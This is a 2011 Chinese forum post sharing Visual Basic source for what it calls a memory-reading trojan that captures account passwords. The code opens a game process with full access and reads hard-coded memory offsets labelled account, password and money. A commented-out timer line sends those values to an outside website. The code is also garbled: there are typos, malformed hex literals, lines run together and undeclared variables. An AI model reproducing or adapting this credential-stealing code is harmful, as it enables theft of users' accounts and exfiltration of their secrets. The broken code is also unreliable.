风云使者
|
阅读:4612回复:0
VB编写的内存截取账号密码木马
楼主#
更多
发布于:2011-07-20 12:51
 | |  |  | 直接窗体代码,没有使用模块,以前研究的时候不知道从哪里淘来的,现在我也找不到了,就发出来给大家看看。Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Const STANDRAD_RIGHTS_REQUIRED = ;HF0000
Const SYNCHRONIZE = ;H100000
Const PROCESS_ALL_ACCESS = STANDRAD_RIGHTS_REQUIRED Or SYNCHRONIZE Or ;HFFF
Private Sub jiequ()
Dim xutao2116 As Long
Dim pid As LongDim ecxi As Long
Dim hwnd As Long
Dim phandle As Long
xutao2116 = FindWindow(vbNullString, "扫雷")
MsgBox "123"GetWindowThreadProcessId xutao2116, pid
phandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)Dim nc As String, mi As String, qia As String
nc = Space(255)
mi = Space(255)
qia = Space(255)
Dim ncn As Long
Dim ncn2 As lonng
Dim mima As Long
Dim qian As Long
Dim qian1 As Long
Dim qian2 As Long
Dim dj As Long
'在内存地址中读取数据ReadProcessMemory phandle, ByVal ;H100579C, ByVal VarPtr(ncn), 4, 0ReadProcessMemory phandle, ncn + ;H124, ByVal VarPtr(ncn2), 4, 0ReadProcessMemory phandle, ncn2, ByVal VarPtr(ncn3), 4, 0ReadProcessMemory phandle, ncn2, ByVal nc, 4, 0 '帐号ReadProcessMemory phandle, ncn + ;H128, ByVal VarPtr(mima), 4, 0ReadProcessMemory phandle, mima, ByVal mi, 20, 0 '密码
ReadProcessMemory phandle, ByVal h91b64c, VarPtr(qian), 4, 0
ReadProcessMemory phandle, ByVal (qian + ;H28), ByVal VarPtr(qian1), 4, 0
ReadProcessMemory phandle, ByVal (qian1 + ;H28), ByVal VarPtr(qian2), 4, 0
Text1.Text = nc
Text2.Text = mi
Text3.Text = qian2
CloseHandle hProcess
Timer1.Enabled = True
End Sub
Private Sub Timer1_Timer()
'webBrowser1.Navigate http://www.st59.com/ ; Text1 ; Text2 ; Text3
End Sub
Private Sub WebBrowser1_StatusTextChange(ByVal Text As String)
End Sub
| |  | |  |
|
